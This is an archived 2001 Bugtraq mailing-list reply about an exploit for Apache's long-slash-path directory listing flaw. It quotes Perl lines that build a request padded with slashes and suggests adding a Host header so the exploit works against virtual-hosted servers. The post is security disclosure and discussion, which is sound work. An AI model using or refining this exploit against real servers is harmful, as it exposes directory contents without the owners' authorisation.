Bugtraq mailing list archives
Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit
From: Stephen Cope <mail-d-20010615 () kimihia org nz>
Date: Fri, 15 Jun 2001 14:48:44 +1200
In my testing you need to take the Host header into account. : $url = "GET "; : $buffer = "/" x $low . " HTTP/1.0\r\n"; : $end = "\r\n\r\n"; The server I tested against uses mod_rewrite to do virtual hosting, and it arrived at a different magic number with the host header, and against without the header. I made the following change to the above code: $buffer = "/" x $low . " HTTP/1.0\r\nHost: ". $host ."\r\n"; Should be fairly easy to understand. -- Stephen Cope <http://sdc.org.nz/> Sign the petition and Stop the Pop: http://lifefm.org.nz/petition/
Current thread:
- Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit Matt Watchinski (Jun 13)
- Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit Stephen Cope (Jun 15)